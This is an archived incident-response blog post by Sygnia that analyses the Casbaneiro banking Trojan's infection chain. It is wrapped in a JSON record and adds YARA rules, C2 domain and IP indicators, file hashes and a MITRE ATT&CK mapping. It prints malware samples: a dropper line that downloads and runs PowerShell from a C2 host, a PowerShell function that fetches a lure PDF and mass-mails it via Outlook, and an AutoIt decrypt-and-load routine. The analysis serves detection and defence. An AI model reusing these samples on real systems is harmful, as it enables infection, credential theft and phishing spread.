{
	"id": "516bd550-a9e2-446e-915c-d700c775b545",
	"created_at": "2026-04-06T00:08:23.589486Z",
	"updated_at": "2026-04-10T03:20:25.28019Z",
	"deleted_at": null,
	"sha1_hash": "4a0987254e47430711cf583ecfc826c17549d218",
	"title": "Breaking Down the Casbaneiro Infection Chain",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1066248,
	"plain_text": "Breaking Down the Casbaneiro Infection Chain\r\nBy Sygnia\r\nPublished: 2022-04-07 · Archived: 2026-04-02 12:44:17 UTC\r\nBackground\r\nIn 2018, the Casbaneiro banking Trojan (also referred to as Metamorfo) surfaced in mass MalSpam campaigns targeting\r\nLatin America. The primary objective, based on built-in functions, was to record keystrokes and harvest user credentials for\r\nfinancial websites.\r\nTo this day, the campaign is still very active with the target objective of financial gain. The threat actors behind the\r\ncampaign utilize a variety of techniques to avoid detection and execute malicious code on compromised assets. A high-level\r\nvisual representation of the multi-stage infection chain, depicted in Figure 1, has been derived from incidents investigated\r\nand mitigated by Sygnia’s Incident Response Team.\r\nFigure 1: Casbaneiro Trojan infection chain\r\nInitial access \u0026 propagation\r\nThe infection begins with a malicious email written in Spanish emphasizing the urgent need for reviewing a PDF attachment\r\n(“Comprobante_Fiscal_Digital.pdf”). These attachments typically contain an invoice with a web link to a URL which claims\r\nto contain further details.\r\nFigure 2: Snippet of “Comprobante_Fiscal_Digital.pdf”\r\nOnce a user has accessed the website, they are prompted to download a zip archive containing a malicious “.cmd” script.\r\nClicking the script initiates a series of commands hidden from view, and will trigger the download of additional scripts and\r\nbinaries from one of many selected malicious domains.\r\nset LBXU=in 1 –\r\nset FPBB=GUV398481\r\nset NN=http://a93ks.hopto[.]org/300122/YXP=FSVPJJBEKT295058/YXP=FSVPJJBEKT295058\r\necho ieX(“IeX(New-oBJeCt Net.WebClIeNt).DOwnlOadStRING(‘%NN%’)”); |\r\n%QAOW%%FWI%%MSBJK%%JJIJ%%QRNT%%YFF%%BPQBDM%%IJPB%%HDFSKP%%SZN%%QACX%%ICYJRO%%UBSD%%HE\r\nDEL “%~f0″ \r\nFigure 3: Partial code-snippet of the dropper “.cmd” script\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 1 of 10\n\nAs with many similar incidents, the adversary utilizes a “living-off-the-land” approach, using common binaries and scripts,\r\nmost notably PowerShell, in order to carry out a variety of tasks. The threat actors use variables that include non-standard\r\ncharacters, strings encoded in Base64 UTF-16LE (Unicode), and which operate in memory during execution, all in an\r\nattempt to avoid detection and hamper reverse-engineering.\r\nFigure 4: Snippet of obfuscated PowerShell code as seen in PowerShell/Operational Windows Event Logs\r\nA series of system discovery commands leveraging PowerShell and Windows Management Instrumentation (WMI) are\r\ncarried out on the victim host, in order to fingerprint the system. This includes the collection of basic information such as the\r\nlanguage, AntiVirus software, operating system version, CPU and hostname:\r\n$lang = Get-Culture\r\n{ $AntivirusProduct = Get-WmiObject -Namespace “root\\SecurityCenter2” -Query\r\n“SELECT * FROM AntiVirusProduct” @psboundparameters\r\n$winds = (Get-WmiObject -class Win32_OperatingSystem).Caption\r\n$env:PROCESSOR_ARCHITECTURE\r\n$env:computername\r\nAs with most MalSpam campaigns, we would expect to see an increased number of malicious emails received from external\r\ndomains. However, of particular interest in our analysis, we have observed the threat actors installing Outlook Messaging\r\nApplication Program Interface (MAPI) via PowerShell to harvest email addresses/contacts, which are then exfiltrated via\r\nHTTP POST requests to a command and control (C2) server. One function that is dedicated to checking data received into a\r\nvariable follows the relevant email address format using the regular expression:\r\n^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$))\r\nThe objective at the end of the process is to leverage the compromised host to send thousands of incidents of MalSpam\r\ninternally to unsuspecting employees of the organization. This adds credibility to the email sent, as there are no obvious\r\nanomalies in the email headers (suspicious external domains), which would typically trigger email security solutions to act\r\nand mitigate. The emails include the same PDF attachment used to compromise the previous victim hosts, and so the chain\r\nis executed once more.\r\nfuncE\r\nparte de envio de emails\r\n$path = “C:\\Users\\Public\\010222”\r\n$path2 = “C:\\Users\\Pubic\\010222\\Combrobante_Fiscal_Digital.pdf”\r\n{var22} = “http://192.53.120.76/tst.factura,odf”\r\nif (($path | Test-Path)) { Remove-Item $path -Recurse }\r\nNew-Item -ItemType directory -Path $path\r\n{var23} = new-object System.Net.WebClient\r\n{var23}.DownloadFile”(var22)”,”$path2″\r\n$OL = {var2}\r\n$result = {var4}\r\nforeach ($line in $result.Split(“‘n”)) {\r\n$hora = Get-Date -Format G;\r\nforeach ($file in (Get-ChildItem -Path $path -File)) {\r\n$mItem = $OL.CreateItem(“olMailItem”)\r\n$mItem.To = “$line”\r\n$mItem.Subject = “Te ha enviado un Comprobante Fiscal Digital :ATT $hora”\r\n$mItem.Body = “Consulte los datos adjuntos, por favor. $hora “\r\n$mItem.Attachments.Add($file.FullName)\r\n$mItem.Send()\r\n}\r\nstart-sleep \r\nFigure 5: De-obfuscated PowerShell function for distributing emails\r\nStaging bundled malware, persistence \u0026 execution\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 2 of 10\n\nThe setup of the malware involves multiple scripts and legitimate binaries that are downloaded as part of the previous\r\nstages. During one of the infection stages, a zip file is dropped into the directory “\\Users\\Public\\”, in order to stage one of\r\ntwo bundles.\r\nFigure 6: “m.zip”, two separate bundles\r\nA “.cmd” script with a filename matching the victim hostname is used to randomly generate a directory on the root of\r\nvolume “C:\\” following the naming format of the folder as “_\u003c6 letters + 1 number\u003e_\u003ccapital letter\u003e”. This can be\r\ntranslated into a regular expression for the purposes of identification:\r\n_{1}[A-Za-z]{6}[0-9]_[A-Z]{1}\r\n@Echo off\r\nSetlocal EnableExtensions\r\nSetlocal EnableDelayedExpansion\r\ncd %SystemRoot%\\System32\r\nSet /P _yuzhtp2_V=\u003c“C:_yuzhtp2_V\\”\r\nset chars=0123456789abcdefghijklmnopqrstuvwxyz\r\nfor /L %%N in (10 1 36) do (\r\nfor /F %%C in (“!chars:~%%N,1!”) do (\r\nset “_yuzhtp2_V=!_yuzhtp2_V:%%N=%%C!”\r\n)\r\n)\r\n)\r\nfor /F %%F in (“!_yuzhtp2_V!”) do (\r\nset “_yuzhtp2_V=!_yuzhtp2_V:@=!”\r\n)\r\nfor /F %%F in (“!_yuzhtp2_V!”) do (\r\nset “_yuzhtp2_V=!_yuzhtp2_V:”=!”\r\n)\r\n%_yuzhtp2_V%\r\n Figure 7: Code-snippet of the “.cmd” script used for folder directory setup\r\nThe next phase in the infection chain is the execution of the banking Trojan malware on the victim host. This is achieved by\r\none of two methods, whilst evading detection. The aforementioned naming convention is used with Execution Method 1 to\r\nrename the bundled encrypted binaries. The only exemption to this is Execution Method 2 where only the folder directory\r\nand non-DLL recognized binaries are renamed due to the technique leveraged during execution, which we will explore\r\nfurther shortly.\r\nIn order to execute the binaries and scripts, shortcut “.lnk” files are created, and masquerade as symbolic links to Internet\r\nExplorer, when in fact they point towards the malicious files. The shortcuts are first used to execute the “.cmd” scripts used\r\nfor renaming the folder and next for executing AutoIt to trigger the start of the execution chain.\r\nWhenever the Windows operating system starts, the legitimate application is launched, thus providing a persistence\r\nmechanism. It should be noted that Sygnia did observe deletion of the “.lnk” files on some occasions, post-execution. This is\r\nlikely because every time the scripts are run, a new randomly named folder directory is generated, anda significant amount\r\nof abnormal folder names would be visible and may raise concern amongst users if spotted.\r\nFigure 8: Obfuscated script creating “.lnk” shortcuts, renaming binaries \u0026 deleting “.zip” files\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 3 of 10\n\nFigure 9: Shortcut executing the AutoIt binary with the AutoIt script argument\r\nExecution Method 1\r\nThe first method of execution involves utilizing a legitimate signed AutoIt PE binary, in order to execute an encrypted\r\nAutoIt script. An encrypted AutoIt script is used to export a malicious function from the third bundled binary, which is the\r\nencrypted Trojan. As the process is invoked under a trusted application, the actions subsequently taken may seem legitimate.\r\nAs depicted in Figure 6, three binaries are present in the first bundle: AutoIt (“exe.png”), an encrypted AutoIt script (“1”)\r\nand the encrypted Trojan (“m”). As previously mentioned, these binaries are renamed post-creation by the “.cmd” script\r\nfollowing the naming convention. By reviewing the script binary in a HEX editor, it’s possible to obtain metadata such as\r\nthe versioning, creation time, and the MD5 hash value of the password used to encrypt the script via the Jos van der Zande\r\nAutoIt3 Obfuscator.\r\nOnce decrypted and decompiled, the script contains multiple functions which focus on cryptography primarily for the\r\nobjective of decrypting the Trojan. During the decryption process, a new decrypted binary with a specific file extension is\r\ncreated in the current working directory and then a DllCall is made to invoke the function\r\n“F0x000102030405060708090A0B0C0D0E0F” that is exported from the malicious decrypted dynamic link library (DLL)\r\nbinary, resulting in execution. \r\nGLOBAL $OLA=@WORKINGDIR\r\nGLOBAL $OLA1=STRINGMID($OLA,4,16)\r\n$OLA1=$OLA1\u0026”.ia”\r\nLOCAL $OLA2=$OLA1\u0026”a.db”\r\nLOCAL $OLA3=$CALG_AES_256\r\nLOCAL $OLA4=”60801029″\r\nIF _CRYPT_DECRYPTFILE($OLA1,$OLA2,$OLA4,$OLA3)THEN\r\nENDIF\r\nGLOBAL $OLA5=DLLOPEN($OLA2)\r\nDLLCALL($OLA5,”STRUCT”,”F0x000102030405060708090A0B0C0D0E0F”)\r\n Figure 10: Code snippet of decompiled AutoIt script decrypt, generate \u0026 initiate DllCall\r\nFigure 11: Decrypted Trojan (.iaa.db) with notable export function\r\nThe file extensions of the decrypted payload were hardcoded and could be any of the following, .ai, .ia, .db, .a1, .bc, .iaa.\r\nHowever, these were typically used to masquerade the decrypted payload (i.e. .db, an SQLite database extension).\r\nExecution Method 2\r\nThe second method of execution uses a different version of the archive “m.zip” bundle. As depicted in Figure 6, three\r\nbinaries are present in the bundle; a legitimate Oracle Java Platform SE 8 PE (“exe.png”), a legitimate Microsoft Visual\r\nStudio 2010 (“MSVCR100.dll”) and a malicious dynamic link library (DLL) masquerading as a legitimate file (“jli.dll”)\r\ncommonly used in conjunction with the Oracle Java (“kinit.exe”) file.\r\nA review of the import functions required by the Oracle Java application, as depicted in Figure 12, confirms the requirement\r\nfor a supposing (“jli.dll”) binary developed by Oracle to be present.\r\nFigure 12: Legitimate Oracle Java (kinit.exe) imported functions from jli.dll\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 4 of 10\n\nOn closer inspection of the (“jli.dll”) binary, it does not appear to have been developed by Oracle, based on a review of\r\nstatic properties, as depicted in Figure 13. However, the binary does have export function names which are expected and\r\nrequired by the Java application.\r\nFigure 13: Malicious “jli.dll” file properties\r\nFigure 14: Malicious “jli.dll” file notable export functions\r\nThis is significant, as the adversary intends to facilitate DLL search order hijacking by placing the malicious DLL file in the\r\nsame directory as the legitimate Oracle Java application. This will then be used for DLL side-loading the malicious payload,\r\nresulting in execution.\r\nSygnia was able to identify numerous different payloads, compiled and deployed by the adversary from December 2021\r\nthrough February 2022. Some were packed via “VMProtect” and unpacked into memory upon execution, whilst others were\r\nencrypted and only decrypted upon execution. All of the DLL files were written in Pascal, compiled by “borlanddelphi”, and\r\nwere found to contain Portuguese language strings throughout. Additional embedded functions were found to be obfuscated\r\nto hamper reverse-engineering. What was consistent was the use of the magic string “Staticdata” as the software product\r\nreference in the file properties. This could be utilized to identify any decrypted payloads on hosts, which may not be known\r\nto AntiVirus signature databases.\r\nFollowing further analysis of multiple malware binaries, once initially executed, the malware harvests information including\r\nthe hostname, operating system version and AntiVirus software installed. This data is then exfiltrated to a hardcoded\r\ncommand and control (C2) server via port 80 (HTTP), and the malware awaits further commands.\r\nFigure 15: Initial fingerprinting of victim host \u0026 exfiltration\r\nFull reverse-engineering details are beyond the scope of content for this report. Functions were observed to facilitate\r\nrecording keystrokes from the compromised host. Whilst the malware currently has no known links to facilitate access to\r\nother threat actors, operating under a strict regime, this could lead to more nefarious activities and therefore effective\r\nmitigation should be deployed at the earliest opportunity.\r\nTo learn more about Sygnia’s Incident Response services click here.\r\nIf you are currently impacted by a cyber incident, or are seeking guidance, please contact us or call our 24/7 hotline +1-\r\n877-686-86\r\nAppendices\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 5 of 10\n\nYARA Rules\r\nrule Casbanerio_Dropper_Script\r\n{\r\nmeta:\r\nauthor = “Dan Saunders”\r\ncopyright = “Sygnia”\r\ndate = “22/02/2022”\r\nversion = “1.0”\r\ndescription = “Detects Casbanerio Dropper Script.”\r\ntlp = “WHITE”\r\nstrings:\r\n$s1 = “%SystemRoot%” wide ascii\r\n$d1 = “http://a93ks.hopto.org” wide ascii\r\n$d2 = “http://dz.myddns.me” wide ascii\r\n$d3 = “http://newyear1.gotdns.ch” wide ascii\r\n$d4 = “http://m9b4s2.site” wide ascii\r\n$p1 = “IeX(New-oBJeCt Net.WebClIeNt).DOwnlOadStRING(‘%NN%’)” wide ascii\r\n$p2 = “Ie X (N ew-oBJ e Ct N et. Web ClIeNt ).DOwnlOa d StRIN G(‘%NN%’)” wide ascii\r\n$r1 = “%~f0” wide ascii\r\ncondition:\r\n$s1 and (1 of ($d) and (1 of ($p) and $r1 and filesize \u003c 1KB))\r\n}\r\nrule Casbanerio_Directory_Script\r\n{\r\nmeta:\r\nauthor = “Dan Saunders”\r\ncopyright = “Sygnia”\r\ndate = “22/02/2022”\r\nversion = “1.0”\r\ndescription = “Detects Casbanerio Directory Script.”\r\ntlp = “WHITE”\r\nstrings:\r\n$s1 = “%SystemRoot%” wide ascii\r\n$s2 = “Setlocal EnableExtensions” wide ascii\r\n$s3 = “Setlocal EnableDelayedExpansion” wide ascii\r\n$s4 = “set chars=0123456789abcdefghijklmnopqrstuvwxyz” wide ascii\r\n$s5 = “Set /P” wide ascii\r\n$s6 = “for /L %%N” wide ascii\r\n$s7 = “for /F %%C” wide ascii\r\n$s8 = “for /F %%F” wide ascii\r\ncondition:\r\nall of ($s*) and filesize \u003c 500\r\n}\r\nrule Casbanerio_Trojan_DLL\r\n{\r\nmeta:\r\nauthor = “Dan Saunders”\r\ncopyright = “Sygnia”\r\ndate = “22/02/2022”\r\nversion = “1.0”\r\ndescription = “Detects Decrypted Casbanerio Trojan DLL.”\r\ntlp = “WHITE”\r\nstrings:\r\n$fh = { 4D 5A 50 }\r\n$s1 = “Staticdata” fullword wide ascii\r\n$s2 = “com.embarcadero.Staticdata” fullword wide ascii\r\ncondition:\r\n$fh at 0 and (all of ($s*) and filesize \u003e 10KB and filesize\u003c 20KB)\r\n}\r\nIndicators of Compromise \r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 6 of 10\n\nDomains \u0026 IPs\r\nVALUE DESCRIPTION\r\nk9b[.]site C2 Domain\r\na93ks.hopto[.]org C2 Domain\r\nckws[.]info C2 Domain\r\nm9b4s2[.]site C2 Domain\r\ndz.myddns[.]me C2 Domain\r\nnewyear1.gotdns[.]ch C2 Domain\r\na9m1x[.]icu C2 Domain\r\n139.177.194[.]76 C2 IP Address\r\n172.105.98[.]184 C2 IP Address\r\n192.53.120[.]76 C2 IP Address\r\n45.79.48[.]129 C2 IP Address\r\n45.79.52[.]41 C2 IP Address\r\n45.79.52[.]25 C2 IP Address\r\n172.105.105[.]85 C2 IP Address\r\n45.33.53[.]179 C2 IP Address\r\n185.230.141[.]242 C2 IP Address\r\nFile Hashes\r\nHASH (SHA1) FILE NAME DESCRIPTION\r\nfbeb9f7a7a058f49ee9cc13bd6430d07b1843ff3 Comprobante_Fiscal_Digital.pdf Spear phishing\r\n2a4062e10a5de813f5688221dbeb3f3ff33eb417 exe.png AutoIt v3\r\n615dc2fa827fab39e16a7e9721f484e7f4d34f8e exe.png\r\nJava(TM)\r\nPlatform SE 8\r\n12822e1372ced962e6c3ec9bf5f258181fa1fbcb djrwi1_%Txmg(761275).cmd Dropper\r\n4ad185fa0c9ec29a0de85b8d47d11984d0db3c47 dxheok_LI%v9aa_(66).cmd Dropper\r\n2accdeb25938d4857dc54c03ea1d791e198482e6 itvjl%F_(16061).cmd Dropper\r\n7baccbc6b4748aee4945bb6b79a32192bf141971 jebH_r%zQqs(38226).cmd Dropper\r\n8fc76b0f8f25ce5a24e54f7da2be5e354b62f05a kWdE%ZsfyR(5962045).cmd Dropper\r\n63782b0f5b394ae09b6996c266b17463325e866b mpbjNDLM%LQw6(27).cmd Dropper\r\nb2f3077e17c6040570fafc86a4b34a602bf7180b reazczQR%Fd(4908).cmd Dropper\r\n7ec72dbea435e17263fa7fca86c50c239886f5cc shsgjiNGW_%6HD(102470).cmd Dropper\r\nc0b572cd3e7c39fef612033d77b521aa939ec87e upi6z1_%G9(335994).cmd Dropper\r\n5c74508b6b6876a8dfa28b82eebb7b5e75850f1a wdoz_BGV%AHU(8840).cmd Dropper\r\n7b70f2fdafae892d7dc61e64513fc9ab2f8997a9 wtrg_zz%qjh_O(70196).cmd Dropper\r\n9ba579bd62247f5619636c22217372f298fd9ee1 wxy_o%i_(20).cmd Dropper\r\nad73fb678e6cac849fe756090a9019a069746224 wyyvxNOyC%Vv(32718).cmd Dropper\r\n05c3633b2015b1bb759c11dbf9c2b189574f864d xeanbOd_i%qF4n(58077).cmd Dropper\r\n50e0a640571564068c5cfb60f890fb954a2f8895 ybr_D%xR(789980).cmd Dropper\r\nae67320aaa6fb6ec8c46e98f27778ae9f55e234f yD_z__%J_(90637).cmd Dropper\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 7 of 10\n\nd41fbaa6516d553138b992ce9887ced5a55481be _tnrqdz5_T.ai\r\nAutoIt script\r\nencrypted\r\n191c8778cb9a8a3ceb41e2ef497b448998c5f22d _tnrqdz5_T.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\n1521d9513137eb4d9566dba7a9d0bba746baa941 _bgsure4_G.ai\r\nAutoIt script\r\nencrypted\r\na3173e18ac423257f7c5e070b72446bcb790b5ac _bgsure4_G.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\n88b50eeaa46ac046fa35bbb24f33150034752129 _bzpvwq5_C.ai\r\nAutoIt script\r\nencrypted\r\ne37cf65152c1ab488af2cfb70103c09701b102ac _bzpvwq5_C.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\n88b50eeaa46ac046fa35bbb24f33150034752129 _nhfpcm3_C.ai\r\nAutoIt script\r\nencrypted\r\n5d436d47c2407099dcaa480369b3d50a01306adb _nhfpcm3_C.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\n982a3f68204b1b93d2f6e13c22f4816fa168ea91 _sxvbak6_B.ai\r\nAutoIt script\r\nencrypted\r\ne7a71b958ac46cad16ded1b5afec5e61cd55330f _sxvbak6_B.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\nd41fbaa6516d553138b992ce9887ced5a55481be _vbjsxk7_G.ai\r\nAutoIt script\r\nencrypted\r\n8a290ac2228f2488393cdd8c8f03118992859e60 _vbjsxk7_G.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\n1521d9513137eb4d9566dba7a9d0bba746baa941 _zqvrxa7_J.ai\r\nAutoIt script\r\nencrypted\r\n641e4ac21fb869e1fca986cd4bdef79fa6c1a83a _zqvrxa7_J.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\nd41fbaa6516d553138b992ce9887ced5a55481be _ndvmrf7_R.ai\r\nAutoIt script\r\nencrypted\r\nd2cdca25e93963ab14555840aab1d05aee8d1ef4 _ndvmrf7_R.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\n88b50eeaa46ac046fa35bbb24f33150034752129 _yuzhtp2_V.ai\r\nAutoIt script\r\nencrypted\r\n6a52169c5963628577e8776af2fcbb02560c25d9 _yuzhtp2_V.ia\r\nCasbaneiro\r\npayload\r\nencrypted\r\n6caadbbc171d877d485bc4d3db08ed226072ca68 _yuzhtp2_V.ia__yuzhtp2_V.ia\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n46a01b0c3a782a51f4bf113c0b8a2d29254131db _abcdeg2_V.iaa.db\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 8 of 10\n\n37bbc51b6a20d9f95b9b6c78f0ecc013c4feb49f _bgsure4_G.iaa.db\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n954126b7f7e5450ed9fcd7238db298a781fc65e9 _bzpvwq5_C.ia_bzpvwq5_C.ia\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n4dbde7ce0877c34655523669b165d996784b3fa3 _ndvmrf7_R.ia.a1\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n10283bed9344e469e7439db2f34a05efbe6a4b1e _nhfpcm3_C.ia_nhfpcm3_C.ia\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n9bf891536c66ff923766702ec45431a2c88435b3 _sxvbak6_B.ia.bc\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\na02c84518cd357642745cdbe09f8f73eda723eb2 _tnrqdz5_T.ia.a1\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n0a553c70955830a30804fa562fff1ffd335a201d _vbjsxk7_G.ia.a1\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n7b4a4f1035e076beb1525a604176e104a7c330a7 _zqvrxa7_J.iaa.db\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\n8df3e5c5d82ab73b220a233115541676c947e344 jli.dll\r\nCasbaneiro\r\nBanking Trojan\r\ndecrypted\r\nMITRE ATT\u0026CK® TTPs\r\nInitial Access:\r\n1. T1566 – Phishing\r\n1. T1566.001 – Phishing: Spearphishing Attachment\r\n2. T1566.002 – Phishing: Spearphishing Link\r\nExecution:\r\n2. T1204 – User Execution\r\n1. T1204.002 – Malicious File\r\n3. T1059 – Command and Scripting Interpreter\r\n1. T1059.001 – PowerShell\r\n2. T1059.003 – Windows Command Shell\r\n4. T1574 – Hijack Execution Flow\r\n1. T1574.001 – DLL Search Order Hijacking\r\n2. T1574.002 – DLL Side-Loading\r\n5. T1129 – Shared Modules\r\n6. T1047 – Windows Management Instrumentation \r\nPersistence:\r\n7. T1547 – Boot or Logon Autostart Execution\r\n1. T1547.009 – Shortcut Modification\r\nDefense Evasion:\r\n8.  T1140 – Deobfuscate/Decode Files or Information\r\n9. T1036 – Masquerading\r\n1. T1036.005 – Match Legitimate Name or Location\r\n2. T1036.007 – Double File Extension\r\n10. T1027 – Obfuscated Files or Information\r\n1. T1027.002 – Software Packing\r\nCredential Access:\r\n11. T1056 – Input Capture\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 9 of 10\n\n1. T1056.001 – Keylogging\r\n2. T1056.002 – GUI Input Capture\r\nDiscovery:\r\n12. T1518 – Software Discovery\r\n1. T1518.001 – Security Software Discovery\r\n13. T1033 – System Owner/User Discovery\r\n14. T1082 – System Information Discovery\r\nCollection:\r\n15. T1115 – Clipboard Data \r\n16. T1119 – Automated Collection\r\nCommand \u0026 Control:\r\n17. T1102 – Web Service\r\n1. T1102.003 – One-Way Communication\r\nExfiltration: \r\n18. T1041 – Exfiltration Over C2 Channel\r\n19. T1071 – Application Layer Protocol\r\n1. T1071.001 – Web Protocols\r\nIf you are currently impacted by a cyber incident, or are seeking guidance, please contact us or call our 24/7 hotline +1-\r\n877-686-86\r\nThis blog post and any information or recommendation contained herein has been prepared for general informational\r\npurposes and is not intended to be used as a substitute for professional consultation on facts and circumstances specific to\r\nany entity. While we have made attempts to ensure the information contained herein has been obtained from reliable sources\r\nand to perform rigorous analysis, this advisory is based on initial rapid study, and needs to be treated accordingly. Sygnia is\r\nnot responsible for any errors or omissions, or for the results obtained from the use of this blog post. This blog post is\r\nprovided on an as-is basis, and without warranties of any kind.\r\nSource: https://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 10 of 10\n\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/  \nDomains \u0026 IPs  \nVALUE DESCRIPTION \nk9b[.]site C2 Domain \na93ks.hopto[.]org C2 Domain \nckws[.]info C2 Domain \nm9b4s2[.]site C2 Domain \ndz.myddns[.]me C2 Domain \nnewyear1.gotdns[.]ch C2 Domain \na9m1x[.]icu C2 Domain \n139.177.194[.]76 C2 IP Address \n172.105.98[.]184 C2 IP Address \n192.53.120[.]76 C2 IP Address \n45.79.48[.]129 C2 IP Address \n45.79.52[.]41 C2 IP Address \n45.79.52[.]25 C2 IP Address \n172.105.105[.]85 C2 IP Address \n45.33.53[.]179 C2 IP Address \n185.230.141[.]242 C2 IP Address \nFile Hashes  \nHASH (SHA1) FILE NAME DESCRIPTION\nfbeb9f7a7a058f49ee9cc13bd6430d07b1843ff3 Comprobante_Fiscal_Digital.pdf Spear phishing\n2a4062e10a5de813f5688221dbeb3f3ff33eb417 exe.png AutoIt v3\n  Java(TM)\n615dc2fa827fab39e16a7e9721f484e7f4d34f8e exe.png \n  Platform SE 8\n12822e1372ced962e6c3ec9bf5f258181fa1fbcb djrwi1_%Txmg(761275).cmd Dropper\n4ad185fa0c9ec29a0de85b8d47d11984d0db3c47 dxheok_LI%v9aa_(66).cmd Dropper\n2accdeb25938d4857dc54c03ea1d791e198482e6 itvjl%F_(16061).cmd Dropper\n7baccbc6b4748aee4945bb6b79a32192bf141971 jebH_r%zQqs(38226).cmd Dropper\n8fc76b0f8f25ce5a24e54f7da2be5e354b62f05a kWdE%ZsfyR(5962045).cmd Dropper\n63782b0f5b394ae09b6996c266b17463325e866b mpbjNDLM%LQw6(27).cmd Dropper\nb2f3077e17c6040570fafc86a4b34a602bf7180b reazczQR%Fd(4908).cmd Dropper\n7ec72dbea435e17263fa7fca86c50c239886f5cc shsgjiNGW_%6HD(102470).cmd Dropper\nc0b572cd3e7c39fef612033d77b521aa939ec87e upi6z1_%G9(335994).cmd Dropper\n5c74508b6b6876a8dfa28b82eebb7b5e75850f1a wdoz_BGV%AHU(8840).cmd Dropper\n7b70f2fdafae892d7dc61e64513fc9ab2f8997a9 wtrg_zz%qjh_O(70196).cmd Dropper\n9ba579bd62247f5619636c22217372f298fd9ee1 wxy_o%i_(20).cmd Dropper\nad73fb678e6cac849fe756090a9019a069746224 wyyvxNOyC%Vv(32718).cmd Dropper\n05c3633b2015b1bb759c11dbf9c2b189574f864d xeanbOd_i%qF4n(58077).cmd Dropper\n50e0a640571564068c5cfb60f890fb954a2f8895 ybr_D%xR(789980).cmd Dropper\nae67320aaa6fb6ec8c46e98f27778ae9f55e234f yD_z__%J_(90637).cmd Dropper\n Page 7 of 10 \n\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/  \n  AutoIt script\nd41fbaa6516d553138b992ce9887ced5a55481be _tnrqdz5_T.ai \n  encrypted\n  Casbaneiro\n191c8778cb9a8a3ceb41e2ef497b448998c5f22d _tnrqdz5_T.ia payload\n  encrypted\n  AutoIt script\n1521d9513137eb4d9566dba7a9d0bba746baa941 _bgsure4_G.ai \n  encrypted\n  Casbaneiro\na3173e18ac423257f7c5e070b72446bcb790b5ac _bgsure4_G.ia payload\n  encrypted\n  AutoIt script\n88b50eeaa46ac046fa35bbb24f33150034752129 _bzpvwq5_C.ai \n  encrypted\n  Casbaneiro\ne37cf65152c1ab488af2cfb70103c09701b102ac _bzpvwq5_C.ia payload\n  encrypted\n  AutoIt script\n88b50eeaa46ac046fa35bbb24f33150034752129 _nhfpcm3_C.ai \n  encrypted\n  Casbaneiro\n5d436d47c2407099dcaa480369b3d50a01306adb _nhfpcm3_C.ia payload\n  encrypted\n  AutoIt script\n982a3f68204b1b93d2f6e13c22f4816fa168ea91 _sxvbak6_B.ai \n  encrypted\n  Casbaneiro\ne7a71b958ac46cad16ded1b5afec5e61cd55330f _sxvbak6_B.ia payload\n  encrypted\n  AutoIt script\nd41fbaa6516d553138b992ce9887ced5a55481be _vbjsxk7_G.ai \n  encrypted\n  Casbaneiro\n8a290ac2228f2488393cdd8c8f03118992859e60 _vbjsxk7_G.ia payload\n  encrypted\n  AutoIt script\n1521d9513137eb4d9566dba7a9d0bba746baa941 _zqvrxa7_J.ai \n  encrypted\n  Casbaneiro\n641e4ac21fb869e1fca986cd4bdef79fa6c1a83a _zqvrxa7_J.ia payload\n  encrypted\n  AutoIt script\nd41fbaa6516d553138b992ce9887ced5a55481be _ndvmrf7_R.ai \n  encrypted\n  Casbaneiro\nd2cdca25e93963ab14555840aab1d05aee8d1ef4 _ndvmrf7_R.ia payload\n  encrypted\n  AutoIt script\n88b50eeaa46ac046fa35bbb24f33150034752129 _yuzhtp2_V.ai \n  encrypted\n  Casbaneiro\n6a52169c5963628577e8776af2fcbb02560c25d9 _yuzhtp2_V.ia payload\n  encrypted\n  Casbaneiro\n6caadbbc171d877d485bc4d3db08ed226072ca68 _yuzhtp2_V.ia__yuzhtp2_V.ia Banking Trojan\n  decrypted\n  Casbaneiro\n46a01b0c3a782a51f4bf113c0b8a2d29254131db _abcdeg2_V.iaa.db Banking Trojan\n  decrypted\n Page 8 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/"
	],
	"report_names": [
		"breaking-down-casbaneiro-infection-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434103,
	"ts_updated_at": 1775791225,
	"ts_creation_date": 0,
